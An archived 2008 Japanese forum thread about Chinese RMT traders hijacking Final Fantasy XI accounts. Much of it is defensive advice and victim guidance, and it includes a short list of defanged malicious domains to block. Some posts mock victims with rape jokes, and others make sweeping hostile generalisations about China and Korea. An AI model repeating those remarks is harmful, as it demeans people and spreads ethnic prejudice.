5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

●● RMT業者の垢ハックが多発している件17 ●●

1 :既にその名前は使われています:2008/04/02(水) 21:48:55.99 ID:jznJUi31
RMT業者が一般プレイヤーのID・パスワードを盗んで不正にログインし、
アイテムやギルを奪う事件についてのスレッドです。詳細は>>2-10くらい
前スレ→http://live27.2ch.net/test/read.cgi/ogame/1206448992/
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり)
ttp://ort.sakura.ne.jp/taisai/
FF11Warning(ハッキングに重点をおいて詳しくまとめてあります)
ttp://miku.a.orn.jp/miku2/
FFXI Virus問題 まとめサイト(初心者さん向け)
ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★リアルタイムで被害に遭われている方へ★

まずサポセンに電話し、不正アクセスの被害にあっていると伝えましょう(本人確認の後、対処してくれます)
■スクウェア・エニックス インフォメーションセンター
  TEL:0570-003-399(PHSからは03-5333-1860)
  月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
※サポセンが営業時間外の場合は、別アカウントを所持しているならそれでログインしてGMを呼ぶか、
  他にログインできるアカウントがない場合はサポセンが開いてから電話をすることになります。

2 :既にその名前は使われています@Free Tibet:2008/04/02(水) 21:50:20.72 ID:oE2JZdxD
どうでもいいし

3 :既にその名前は使われています:2008/04/02(水) 21:52:07.67 ID:jznJUi31
■アカウントハックとは
主に中国のRMT業者(※1)がFF11関係のサイト(blogや情報サイト等)にアカウント情報を吸い出せる
罠ツールを仕掛けたサイトアドレスを貼り、FF11プレイヤーにそれを踏ませることにより
IDとpassを盗んで不正にログインし、所持アイテムやギルをを奪ってしまう(※2)行為の事です。
ログイン時にパスワードも変更され利用者本人がログイン出来なくなることも多々あります。

奪われたアイテムは各鯖にいるアイテム販売用キャラ(※3)が競売や店売りしてる模様。

※1:blogへの書き込みIP、リンクで飛んだ先のHPアドレスの所持者を調べると中国な為
※2:アイテムを奪われるだけの人も居れば、サーバー移動させられてたりキャラが消されていたりと多種多様の報告があります。
※3:Luckshop等、確認できるだけで21の鯖にいる業者の販売担当キャラ。FFAHで履歴調べると色々分かります

4 :既にその名前は使われています:2008/04/02(水) 21:52:41.54 ID:jznJUi31
■予防と自衛が各プレイヤーに求められています。
被害に遭わないためにも各自でできる限りの防衛手段を身に着けておきましょう。
【公式より抜粋】

▼内容が不明なサイトにアクセスしない
 ※blogのレスの名前部分(HPアド)にリンクをつけてリンクアドレスを見せないようにする手口もあります。
 絶対にリンクを押す前にアドレスを見る事

▼不明なサイトにあるソフトウェアのダウンロードを不用意に行わない

▼Microsoft Update(Windows Update)を定期的に実行し、Windowsを常に最新の状態に保つ
 ※詳しくはマイクロソフト社の公式サイトを参照のこと。

▼利用しているWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する

▼スクウェアエニックス社が使用を認めていない外部ツールを絶対に使用しない

▼ウイルス駆除ソフトを常に最新のバージョンで使用する

5 :既にその名前は使われています:2008/04/02(水) 21:53:17.27 ID:jznJUi31
■具体的な自衛策
1:ウイルススキャンソフトを導入する。
  ・シマンテック、カスペルスキー、マカフィー、トレンドマイクロ社のソフトを有料で購入する。
  ・AVG、AntiVir、avast!、BitDefenderなどの無料ソフトをダウンロードして使用するという手もあります。

2:WindowsUpdateでWindowsを最新の状態にする
   Windowsは最初にインストールしただけで万全というわけではなく、次々と発見されるセキュリティホールを
   後付で修正し、それをWindowsUpdateで配布することで安全性を保つようにできています。
   一般的には自動更新がされるよう設定されていますが、重いからという理由で自動更新機能を
   オフにしている人もいると思います。その場合は必ず定期的に手動で更新を行ってください。

3:ファイアウォールを有効にする
  ・1に上げた有料ソフト等に同梱されているものや、同じ会社から出ているものを使う

  ・ベクターや窓の杜などでフリーのファイアウォールソフトを探し、導入する
   (2chカテゴリ「ネット関係」>「セキュリティ」板にフリーのファイアウォールソフトの
    スレッドがあります。「ファイアウォール」などの単語で検索してください)

6 :既にその名前は使われています:2008/04/02(水) 21:53:53.72 ID:jznJUi31
■具体的な自衛策その2

4:IPフィルタを導入する
  PeerGuardian2というフリーソフトで特定の国(この場合は特に中国)のIPへのアクセスを遮断できます

  ★PeerGuardian2の導入・設定方法はここから
    リネージュ資料室 ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html
    このURLを踏みたくない人はgoogleで『リネージュ資料室』で検索してメニューから
    セキュリティー対策→IPフィルタ で確認してください。

5:IE以外のウェブブラウザを使用する
  Firefox、Opera、など。
  ただしそれぞれのブラウザにもセキュリティホールが見つかることもあるので、
  ブラウザ自体のアップデートも行う必要があります。
  また、FirefoxはNoscriptというアドオンも同時に導入し、iframeを無効にするよう設定しましょう。

6:不審な・見覚えの無いURLを踏む必要がある場合は、まずaguse.jpやソースチェッカーを使用する。
  ttp://www.aguse.jp/ 
  URLを入力するとそのページのSSとドメイン情報、各ブラックリストに照らし合わせた結果が表示されます。
  ソースチェッカーにはWebページ上のものと、DLして使用できるフリーソフトがあります。

7 :既にその名前は使われています:2008/04/02(水) 21:54:19.83 ID:jznJUi31
■もし被害に遭ってしまった場合
「ある日突然登録してあるパスワードでログインできなくなった」もしくは「ある日ログインすると
キャラクターのアイテムやギルが奪われていた」等の、不正アクセスと思しき被害にあった場合は、
まず>>1にあるサポセンの連絡先に電話してパスワードの再発行を受けたり、不正アクセスの被害を
受けたことを報告しましょう。

現時点(平成19年10月下旬)でのスクウェアエニックス社インフォメーションセンターの。不正アクセス被害者への
対応は、「社内の調査だけでは不正アクセスと断定することができない」という調査結果の報告のみです。

不正アクセスと断定できないとはつまり、「RMT業者に自発的にアイテムやギルを受け渡したのは
被害者本人である」ということにされている状態です。

この状態の打開及びさらなる追及を望むならば、警察への届出が必要になります。
不正アクセス行為の禁止等に関する法律、通称不正アクセス禁止法においては、
こういった事例での被害者は「不正アクセスをされた側」つまりスクウェアエニックス社になりますが、
アカウントを乗っ取られた側でも「利用権の侵害」として被害を届出することができます。

8 :既にその名前は使われています:2008/04/02(水) 21:54:39.85 ID:jznJUi31
■警察への通報方法
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
  都道府県警察本部のサイバー犯罪相談窓口等一覧
  ttp://www.npa.go.jp/cyber/soudan.htm

2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
  (この段階を踏まずに直接所轄署に行くと、「専門の窓口に連絡しろ」と言われてしまう可能性があります)

3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。

4:資料を持参して所轄の署に赴き、「利用権の侵害」での被害を報告します。
  「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが、
  家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
  利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。

9 :既にその名前は使われています:2008/04/02(水) 21:55:04.40 ID:jznJUi31
■警察へ行く際に持っていく・用意しておくもの
過去スレで実際に警察へ行った被害者のレスから抜粋

もっていったもの †
o スクエニの会社情報 HPのプリントアウトしたもの
o プレイオンラインサポセンの電話番号
o 印鑑、身分証明
受け答えしてくれたサポセンの人の名前も伝えるといいかも


警察で聞かれたもの †
o プレイオンラインのIDとパスワード
o キャラ名
o 犯行時間帯
o 被害内容(なくなったゲーム内通貨・アイテム)
o プロバイダ

10 :既にその名前は使われています:2008/04/02(水) 21:55:29.34 ID:jznJUi31
■このスレの目的
1:予防・自衛の徹底の周知
2:被害報告の収集
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする

★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください

☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」、「被害者の会を作れ」等の議論も
この場で行ってくださって構いませんが、スレを見に来た一見さんの質問や被害者の報告は
無視せずに対応してください。

11 :既にその名前は使われています:2008/04/02(水) 21:56:05.43 ID:jznJUi31
----------報告用テンプレ----------
● 実際にアカウントハックを受けた時の報告用
【      気付いた日時          】 (被害に気付いた日時)
【不審なアドレスのクリックの有無 】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
                   (ドメインのドット(.)を■等で置き換える事。h抜き等は駄目)
【他人にID/Passを教えた事の有無】 (Yes/No)
【他人が貴方のPCを使う可能性の有無】 (Yes/No)
【    ツールの使用の有無      】 (Yes/No、Yesの場合はそのToolの説明)
【  ネットカフェの利用の有無    】 (Yes/No)
【     OS    】 (SP等まで書く)
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2008 等の名称、及びパターン更新日)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンで●●.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【hosts変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】(被害状況を詳しく書く)

12 :既にその名前は使われています:2008/04/02(水) 21:57:12.93 ID:jznJUi31
以上テンプレ
真っ白に…燃え尽きたぜ…

13 :既にその名前は使われています:2008/04/02(水) 21:57:46.58 ID:qN4tiyvn
乙一
>>2のツンデレーションに萌えた

14 :既にその名前は使われています:2008/04/02(水) 21:58:03.00 ID:thtB0rmI
>1


15 :既にその名前は使われています:2008/04/02(水) 21:59:04.43 ID:HXzmwiWU
何か GLB7.tmp っていうスパイウェアに感染してた。

16 :既にその名前は使われています:2008/04/02(水) 21:59:59.58 ID:YAm4sMIi
あー気づくの遅れた。
次は >>6 のリネージュ資料室のリンク差し替えてね。
ttp://lineage.paix.jp/guide/security/basic-ipfilter.html

17 :既にその名前は使われています:2008/04/02(水) 22:08:28.85 ID:RIFQ+DWf
超乙  ありがとー!

18 :既にその名前は使われています:2008/04/02(水) 22:11:14.03 ID:0rz3+VLL
大分前に注意喚起のカキコあったサーパラブログはまだあるんだな

19 :既にその名前は使われています:2008/04/02(水) 22:15:57.17 ID:jznJUi31
>>16
しまったそうだったなー
まあ次スレまでは旧ドメインも何とか保ってくれるかな…

20 :既にその名前は使われています:2008/04/02(水) 22:19:28.65 ID:p0v2JblS
まだまだ流れ速いし、なんとかなるでしょう。
>>1乙です!

21 :既にその名前は使われています:2008/04/02(水) 22:20:49.28 ID:jznJUi31
おっとこいつも忘れていたぜ

PG2導入解説動画(改訂版)
http://www.nicovideo.jp/watch/nm2825098

22 :既にその名前は使われています:2008/04/02(水) 22:33:18.59 ID:jznJUi31
警察庁セキュリティポータルサイト@police
ttp://www.cyberpolice.go.jp/index.html
警察庁によるセキュリティ情報提供サイト。セキュリティ最新動向の他、子供向け、一般ユーザ向け、サーバ管理者向けに、
各種講座や被害事例等を紹介

@police−被害事例と対処法
ttp://www.cyberpolice.go.jp/case/pc/index.html
具体的な被害事例と対処法について解説します

23 :既にその名前は使われています:2008/04/02(水) 22:51:15.61 ID:jznJUi31
FC2ブログ ユーザーフォーラム :: トピックを表示 - 原因究明・セキュリティの強化を
ttp://blog.fc2.com/forum/viewtopic.php?t=20829
FC2ブログテンプレ改竄騒動についてのユーザーフォーラム

24 :既にその名前は使われています:2008/04/02(水) 23:18:56.28 ID:b9YbqCA9
ちょっとおまえら、しらん人もいるかもしれんが
mixi(笑)のコメントで

酷いゲーム動画
酷いゲーム動画群...ゲーム ファミコン 動画 ひどい
バカ ネタ 負け レゲー レトロゲーム 先生 スペランカー
URL.zip

ってのきた、でそいつのマイミクとかみると
明らかに名前とか字が中華なんよ
URLは都合上変えたが・・・気をつけろよ

25 :既にその名前は使われています:2008/04/02(水) 23:21:08.92 ID:b9YbqCA9
http://mixi.jp/show_friend.pl?id=17545754
http://mixi.jp/show_friend.pl?id=17546448
http://mixi.jp/show_friend.pl?id=17582439
http://mixi.jp/show_friend.pl?id=17547568

気をつけろ、2chだけじゃなく
厨房の巣窟mixiwでも

って既出?

FFやってないから情報遅いと思うんだけど、一応

26 :既にその名前は使われています:2008/04/02(水) 23:24:19.54 ID:gV9+hkwY
さんざんがいしゅつな質問かもしれんが、PS2ユーザーでもハックの危険はあるんですか?

ルーターは使っていませんがNTTからのマンションタイプのモデムを使用しています。

27 :既にその名前は使われています:2008/04/02(水) 23:49:15.40 ID:keTGK8Hv
>>26
リンクシェルコミュニティを利用して、ウイルス感染の可能性のあるPCからパスワードを
入力していない限り、PS2のみでやってるっていうなら今のところ平気だよ。
ルーター介して云々というのはそういうウイルスもあるってだけで、まだFFのパス抜きには
使われていない。ただし、これからそれも使用される可能性があるってだけかな。

28 :既にその名前は使われています:2008/04/02(水) 23:49:30.62 ID:Kv07gYsh
>>26
過去ログを纏めるとだなあ。
「考え方による。」
ソーシャルハックならハードを問わないからな。

大昔の規格のルーターを使っていて、
尚且つファイルの共有を行っている場合も
情報が漏れるとか有った気がするが、
現在その条件に合う奴はほとんど居ないだろう。

29 :既にその名前は使われています:2008/04/03(木) 00:24:27.72 ID:8XMX1vN+
>>26
ルーター導入マジおすすめ

できるだけ新しい製品を選ぶべし

30 :既にその名前は使われています:2008/04/03(木) 00:50:56.72 ID:urTdv/J5
1おつー

31 :既にその名前は使われています:2008/04/03(木) 01:13:55.55 ID:Q0TCsVv3
まあ、また今週末が怖いわな

32 :既にその名前は使われています:2008/04/03(木) 01:30:23.64 ID:AnGnjUS2
垢ハックスレの紳士たちに質問してもいい?(;´Д`)

iPodを使ってるんですが、更新がありますって出たんでなにげなくダウソしたら
Safariっていうエクスプローラー(?)がインスコされておりました。

これってこのスレでもたまに出てくるSafariと同じものなんでしょうか?
それと、セキュリティ的にSafariがPC上にあるのってどうなんでしょうか?

ヤバかったら速攻でアンインスコしたいっす。
ちなみに普段はFirefoxを使っております。

33 :既にその名前は使われています:2008/04/03(木) 01:33:07.15 ID:nWE05j6O
テンプレのサイトにP2P使っても垢ハックの危険があるって書いてあったけど
具体的にはどういう事?
繋いでるだけでもヤバイって事ですか?それともファイルにウィルスが混ざってるかも知れないって事?


34 :既にその名前は使われています:2008/04/03(木) 01:39:59.21 ID:SJmxvjEp
>>32
SafariというのはAppleが作っているWebブラウザで。MacintoshのOS
Mac OS Xの標準ブラウザでもある。最近はWindows版も作られていて、
iTunesと一緒にインストールされるAppleのアップデートチェッカーが
Windows版のSafari 3.1をインストールするように勧めてくる。

Safari自体は悪いものじゃないんだけど、この3.1には結構危険な脆弱性
(システムを攻撃できる不具合)があるので使わないほうがいい。
使わないなら危険はないのでアンインストールする必要はないけど、
どうせ使わないなら入れておいてもHDD容量の無駄w

動作が軽快だとか、色の管理がマトモだとか、利点もあるので安全な
バージョンになったら試してみるのもいいかもね。

35 :既にその名前は使われています:2008/04/03(木) 01:43:52.07 ID:Z8Ka5BEr
>>32
safariとはブラウザの一種。
http://ja.wikipedia.org/wiki/Safari
(踏む勇気が無いなら自分で検索しる)
シェアが低いので相対的にウイルスに狙われにくい。

36 :既にその名前は使われています:2008/04/03(木) 01:47:59.60 ID:SJmxvjEp
あいや、句点と読点間違えた。

>>33
ファイル交換ソフトでやり取りされるファイルにはウイルスが混入しているものがメチャメチャ多い。
ウイルスを作ってばらまく輩からみると配布するのに理想的な環境だから。
というわけで、「ファイルにウイルスが混ざっている可能性が高い」が主な理由だと思う。
ただし、Winnyのように致命的な脆弱性があるのに原作者がそれを修正不可能な状態にある
ファイル交換ソフトもあるので、その辺も加味されているかと。

37 :既にその名前は使われています:2008/04/03(木) 01:54:16.96 ID:YMHRzhps
>>29
でも、有線ルータに限って言うとお勧めできるものが数年前のものってのがなぁw

有線ブロードバンドルーターのおすすめを教えて 31
http://pc11.2ch.net/test/read.cgi/hard/1202221467/

38 :32:2008/04/03(木) 01:54:42.00 ID:AnGnjUS2
>>34->>35
おお、早速のレスありがとうー。

一応危険はないみたいだけど、使わないしアンインスコしておきます(ノ∀`)

39 :既にその名前は使われています:2008/04/03(木) 02:00:25.60 ID:nWE05j6O
>>36
解り易くありがとー
拡張子見てexeファイルにだけ気をつけておけばいいと思ったけど、繋いでるだけでも外部から攻撃される事もあるのか・・・・・


40 :既にその名前は使われています:2008/04/03(木) 02:18:06.00 ID:V+IuKlSR
予備知識もなしに店頭でとりあえずこれにしとくか・・・って買ったルータが
>>37のリンク先でも評判のいいルータとして分類されていたBBR-4HGだった
ハズレひかなくてよかった;;

41 :既にその名前は使われています:2008/04/03(木) 03:30:07.44 ID:L/HhRKLr
BBR-フォー・ハードゲイ

42 :既にその名前は使われています:2008/04/03(木) 03:55:29.43 ID:3ny3Ig05
>>40
昔は酷い製品だったんですけどファームアップのアップデートで安定するようになりましたね。
もし古いファームウェアをお使いでしたら新しくしましょう。
しかしファームウェアのアップデート作業は自己責任で。

43 :既にその名前は使われています:2008/04/03(木) 05:56:46.98 ID:U50GBeF2
自分所属してるlsメンがレイプされなければ
他鯖の間抜けが何人ファックファックされたところで俺には関係ないことwwwww
wwwwwwwwwwwwwwwwwwwwwww
いやぁたのしいねぇぇ
中華もっと高度なパス抜き考えてもっと大量に涙目生産してくれやぁぁ

44 :既にその名前は使われています:2008/04/03(木) 08:02:19.62 ID:uOZPfPFc
>>43
こういう奴に最初に引っかかってほしいものだ

冗談はさておき、LSメンのフレがハックされてLSで話題になっても
楽しんでいられるんだな?

そん時はとか言い訳すんじゃねえぞ?

45 :既にその名前は使われています:2008/04/03(木) 10:06:24.33 ID:2e9NqRt1
ここ最近の中国からのSQLインジェクション攻撃についての記事。
個人的にはわかりやすい記事かと思う。

あなたの身近なセキュリティ
第10回:WWW編(8)ラックが語るWeb大量改竄の現実
http://internet.watch.impress.co.jp/cda/midika/2008/04/02/19041.html


46 :既にその名前は使われています:2008/04/03(木) 11:03:45.13 ID:qDvBXMmG
LSメン以外はどうでもいいと言うが

容姿・性格ともに低レベルのLSメン<<<可愛くて良い子の同鯖のおにゃのこ

こうなる事は確定的に明らか

47 :既にその名前は使われています:2008/04/03(木) 11:49:00.79 ID:y/tp88SD
身内や美人が被害に遭わなきゃいいってもんじゃないでしょうが。
誰もが被害に遭わないのが一番良いに決まってる

48 :既にその名前は使われています:2008/04/03(木) 12:40:20.41 ID:XhsLSKeR
さがりすぎ。あげとくよ。

49 :既にその名前は使われています:2008/04/03(木) 13:17:08.56 ID:U50GBeF2
レイプされるような女が間抜けなんじゃね?www

50 :既にその名前は使われています:2008/04/03(木) 13:17:30.25 ID:U50GBeF2
垢ファックされるような奴が間抜けなんじゃね?www

51 :既にその名前は使われています:2008/04/03(木) 13:18:53.29 ID:4AgwWbRF
U50GBeF2 はツンデレ保守魔

52 :既にその名前は使われています:2008/04/03(木) 13:35:49.48 ID:uOZPfPFc
>>51
内容がもうちょい萌えだったらツンデレだが、ただの馬鹿だろ

まあ馬鹿でも保守の役に立つならいいが

53 :既にその名前は使われています:2008/04/03(木) 14:19:01.49 ID:bkiD4AGJ
■過去改竄被害blog一覧
     黒猫奮闘記(インラインフレーム・1回改竄され修正済み)
     ぺってん(インラインフレーム・1回改竄され修正済み)
     戦士スキー(インラインフレーム・2回改竄され修正済み)
     某青魔道士(インラインフレーム・2回改竄され閉鎖)
     ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
     ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
     ある黒魔道士の軌跡(Javaスクリプト・1回改竄され修正済み)
     FF11初心者の館(Javaスクリプト・1回改竄され修正中)
     Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・2回改竄され修正済み)
     FINAL FANTASY XI 散策日記(インラインフレーム・1回改竄され修正済み)

54 :既にその名前は使われています:2008/04/03(木) 14:41:07.16 ID:XLSlbZeK
>>53
ぺってん 移転
ある黒魔道士の軌跡 閉鎖
FF11初心者の館 閉鎖


55 :既にその名前は使われています:2008/04/03(木) 15:22:11.79 ID:dBSryzn/
ほ・・・ほ・・・
保っk守ん

56 :既にその名前は使われています:2008/04/03(木) 15:55:58.32 ID:E2C+PImQ
キーロガーが見つかった・・・orz
http://drweb.jp/support/?cureit

57 :既にその名前は使われています:2008/04/03(木) 17:06:31.42 ID:lebZGLI6
最近動きがないからか、落ちそうになるなあ。保守

58 :既にその名前は使われています:2008/04/03(木) 17:37:22.58 ID:Jea3morj
「QuickTime 7.4.5」公開、11件の脆弱性を修正
http://internet.watch.impress.co.jp/cda/news/2008/04/03/19071.html

59 :既にその名前は使われています:2008/04/03(木) 17:52:10.75 ID:hXMUWtPv
iTunes+QuickTimeアップデートしようとしたら、Safariインストールされそうになった

60 :既にその名前は使われています:2008/04/03(木) 17:59:35.40 ID:clCiEtv+
Safariの件は
【ソフト/ブラウザ】モジラCEO、アップルの「Safari」自動アップデートを批判[08/03/24]
http://news24.2ch.net/test/read.cgi/bizplus/1206342787/
で叩かれてる。

MACも体質はMSとかわらん。

61 :既にその名前は使われています:2008/04/03(木) 18:12:59.29 ID:XLSlbZeK
WindowsやiPod+iTunesに匹敵するプロダクトを持たない
Mozillaのヒガミにも聞こえるな

62 :既にその名前は使われています:2008/04/03(木) 18:47:10.47 ID:nYWgvMsh
ひがみも何もこの手の抱き合わせ系は前から問題視されてなかったか?MSで。

63 :既にその名前は使われています:2008/04/03(木) 19:23:23.43 ID:Z8Ka5BEr
ああ、昔々OSにIEがバンドルされてるのが
反トラスト法に違反しているとかで
100万ドル/dayの制裁金を課されている時期があったな。MSは。
あれアメリカのバブルがはじけた後うやむやになっちゃったよね。

64 :既にその名前は使われています:2008/04/03(木) 20:01:13.20 ID:XLSlbZeK
NetscapeがAOLに買収されて消えちゃったのでどうでもよくなった

65 :既にその名前は使われています:2008/04/03(木) 20:18:15.47 ID:KnQYh/HS
中国めちゃくちゃだな、自作自演とかそういうのか?

中国の政府系サイトやソニー中国のページが改竄、F-Secure報告
ttp://internet.watch.impress.co.jp/cda/news/2008/04/03/19074.html

中国の政府系サイトが改竄され、他のサイトのWebページを読み込むIFRAMEタグが
挿入されていることを確認。読み込まれるページはさらに他のサイトを次々に読み込み、
最終的にはWindowsやRealPlayerの脆弱性を悪用してウイルスをダウンロードし、実行させようとする。

66 :既にその名前は使われています:2008/04/03(木) 20:21:57.35 ID:bEeAe5vw
>>65
この間喰らった1万件以上の書き換えに対するNAの報復なのか、
ジサクジエンなのか。

修正が遅いところ見ると自演っぽいけどな。
同じタイミングで中国は世界で一番被害を受けているとか
発表してるし。

67 :既にその名前は使われています:2008/04/03(木) 20:27:25.99 ID:nYWgvMsh
文化そのものが人類の敵だわアノ国は。まじで厨国が原因で世界滅ぶんじゃねーか。

68 :既にその名前は使われています:2008/04/03(木) 20:32:49.67 ID:Qv1YDLYV
>>65
改竄されたページが中国からのアクセス
と言うのを誤魔化す為だろうな
自分達も被害を受けてるのにする訳ないじゃないですか^^;
なんて感じだろ
ホントどうしようもないな

大体中国国内から海外に繋ぐのって制限掛けてる
とか言われてるが何とも無いな

それと中国に行く奴は知ってるだろうが
中国国内にPCを持ち込んで使うと100%ウィルス仕込まれるから気を付けろ

69 :既にその名前は使われています:2008/04/03(木) 20:37:55.25 ID:dBSryzn/
毒入りチャオズの成分、プロミドホスだっけか?
この前中国から飛んできた黄砂に入ってたらしいじゃん。
いい加減にしてほしいなまったく。風で飛んでくるもんは防ぎようがない。
もう自分らだけ毒入り黄砂吸い込んで早く自滅してくれw

70 :既にその名前は使われています:2008/04/03(木) 20:44:30.93 ID:HSGABin6
>>69
チャオズっていうなw

71 :既にその名前は使われています:2008/04/03(木) 20:48:55.54 ID:P8CL8Ry5
>>69
その黄砂も、中国での観測データ貰えなくて、困っている状態だからな。
ニダ国と同様に回りに迷惑かけっぱなしな国はとっとと滅んで欲しいよ

72 :既にその名前は使われています:2008/04/03(木) 21:05:10.37 ID:Mm2Onsbt
>>69
プロマシアミッションにトラウマのある方とお見受けした。

73 :既にその名前は使われています:2008/04/03(木) 21:11:06.88 ID:5emn+8RD
>65
改竄部分のドメインはこれな。
www■751down■cn

対日攻撃に転用してくると思うからhostsにつっこんでおくといいと思うよ。
ともあれ気をつけてくれよな!


74 :既にその名前は使われています:2008/04/03(木) 21:16:16.79 ID:SJmxvjEp
>>73
さらに関連するホストはこのへん
vip2●51●la
vip2●51web●my-free●info
ww3●tongji123●com
s137●cnzz●com
js●users●51●la
51js●th-club●com

75 :既にその名前は使われています:2008/04/03(木) 22:40:46.48 ID:A76jmN1p
FF13のテンプレのFC2ブログがやばかったらしい

結構踏んだ人いたんじゃねぇのか(;^ω^)

76 :既にその名前は使われています:2008/04/03(木) 22:41:05.00 ID:A76jmN1p
FF13スレの、だw

77 :既にその名前は使われています:2008/04/03(木) 22:44:27.39 ID:I0uxieqw
どうでもいいけど今回の垢ハック祭りの諸悪の根源がFFAHってまだ伏せてるの?

78 :既にその名前は使われています:2008/04/03(木) 22:48:10.30 ID:bEeAe5vw
>>77
kwsk

79 :既にその名前は使われています:2008/04/03(木) 22:48:39.77 ID:A76jmN1p
>>53
これも頼む
FFKH情報局

80 :既にその名前は使われています:2008/04/03(木) 22:49:32.86 ID:pOS9YG3Z
被害にあって3ヶ月経ったのにまだGMから報告こねーな、救済措置拡大するか決めてからなのかね・・・
それだと既にアイテム救済サービス適用された人カワイソすぐるなwww

81 :既にその名前は使われています:2008/04/03(木) 22:53:21.64 ID:w3jTAMt7
>>79
追加(パス変わったため、管理人放置状態)


82 :既にその名前は使われています:2008/04/03(木) 23:20:25.64 ID:0YVl9gVI
全国のセブン-イレブンにて『WebMoney』の販売を開始,
マルチコピー機「プリペイドサービス」にて取り扱い
ttp://www.webmoney.co.jp/news2008/r20080403.html

クレカの奴は切り替えを考えてみてはどうでしょうか?

83 :既にその名前は使われています:2008/04/03(木) 23:24:23.55 ID:Z8Ka5BEr
>>78
ffxiah.comはiframeを用いてサイト内に広告を表示している。
このため過去何度か罠入り広告が表示されたことがある。
サイト管理者はそういうことがあったことを認めてはいるが、
既に弾いたので現在は問題ないとしている。

向こうのフォーラムに張ってあるFAQ(既出の質問)
Q:RMT業者の広告を選別拒否することもできるのになぜしないのか?
A:以前それをやったらアフィで稼げずサイト運営が赤字になった。
  なのでRMTは認めないが広告拒否はしません。

84 :既にその名前は使われています:2008/04/03(木) 23:26:31.37 ID:Z8Ka5BEr
>>77の言い方はちょっと大げさだな。
当たらずとも遠からずといったところか。俺は便利だから使うけどね。

85 :既にその名前は使われています:2008/04/03(木) 23:31:19.48 ID:I0uxieqw
大げさだったなスマソ
しかしAH踏んだことあるひとは一度スキャンしてみるとイイかもねー。

86 :既にその名前は使われています:2008/04/04(金) 00:03:55.28 ID:4CBdo5HW
>>66 >>68
おまいらの脳内ではchina13億人が一枚岩なのか
何脳だとそういう発想になるんだ

87 :既にその名前は使われています:2008/04/04(金) 00:13:38.20 ID:jPiKGxKT
最近のmixiは酷いな。週に2個は各FFコミュに罠サイトへのリンクを貼ってやがる。

88 :既にその名前は使われています:2008/04/04(金) 00:24:55.11 ID:35tLGtHC
>>80
俺も被害から警察の認定貰ってから3ヶ月で同じ状態だわ
新しい救済方針の検討とやらを本当にしてるならいんだが

89 : ◆vddkNh7Yho :2008/04/04(金) 00:31:18.78 ID:wzeDFu9W
>>80
はじめの方のスレで管巻いてた被害者どす
自分は救済サービスを既に受けておりますが、もし今後救済の範囲が広がった場合に、
あらたに救済対象となるアイテムが出たときは、改めてその救済を行ってくれると
GMから言質を取ってあるですよ。
だからもし新方針の前に救済サービスを受けられるとしても後のことを考えて躊躇う必要はなし。
ただしいつ受けられるかは分からない。

90 :既にその名前は使われています:2008/04/04(金) 00:39:02.38 ID:lNamtvW7
>>86
年間数百億のRMT被害、2年前から続く鯖アタック、しかし全く対応なし。
それなのに世界中でハックがあったと言う報道だけで「俺も俺も」と手の平返した報道。
そのHPも自分の持ちHPと世界に名だたるソニーの…なぜか「中国」サイト。
クラックした人間はかなりの知能犯(サーバー構造を知っていて仕掛けた可能性高い)なのに、
そんな意味不明(儲け的意味で)なサイトをハッキングする理由が全く解らない。
そんな聞き方する時点で=無知ってかあんた中国政府関係者?
ってきき返しされてもしょうがない。

91 :既にその名前は使われています:2008/04/04(金) 01:03:18.38 ID:1aEJTahR
http://pc11.2ch.net/test/read.cgi/blog/1154870830/895-

ブログ民もやられたみたい。
外出だったらスマソ

92 :既にその名前は使われています:2008/04/04(金) 01:03:22.07 ID:xRuVRxrT
real playerアンインストールで安心するのはまだ早いw コントロールパネル、ネットワーク、windowファイアーウオール、例外を開いてみるがいいw
winnyやらいろいろ例外設定なってて怖くなるからww

93 :既にその名前は使われています:2008/04/04(金) 01:14:34.28 ID:By/W+4lc
IEインターネットオプションの制限付きサイトに*.cnが突っ込めねえ

94 :既にその名前は使われています:2008/04/04(金) 01:40:52.96 ID:EbLHlq2f
>>90
たった2行でchina政府関係者に成れるのか! この2行を
追加したら何に成れるんだろうな 楽しみだ 期待を裏切らないでくれ

95 :既にその名前は使われています:2008/04/04(金) 01:56:46.62 ID:wzeDFu9W
保守にご協力いただき誠にありがとうございます
blogminは公式すらクラックされてるのかな、どこを見ても認証画面が出てくる

96 :既にその名前は使われています:2008/04/04(金) 01:59:32.84 ID:5YsKmYyG
ブログ民ってなんだろうと思ったら、blogmin.jpというのがあるのかー。
ざっくりとやられちゃったみたいだな。fc2より脆弱。

97 :既にその名前は使われています:2008/04/04(金) 02:02:32.29 ID:lNamtvW7
>>94
はいはい。2chのプロさんは大人しく政治板に帰った帰った。
なんにせよ、今ネ実自体で中華排除運動やってるような状態なんだから、空気読め。

98 :既にその名前は使われています:2008/04/04(金) 02:04:41.75 ID:34aU2DDU
他人のはぁはぁ日記みにいったりするから感染するのですよw

99 :既にその名前は使われています:2008/04/04(金) 03:03:16.13 ID:hOpDLR6p
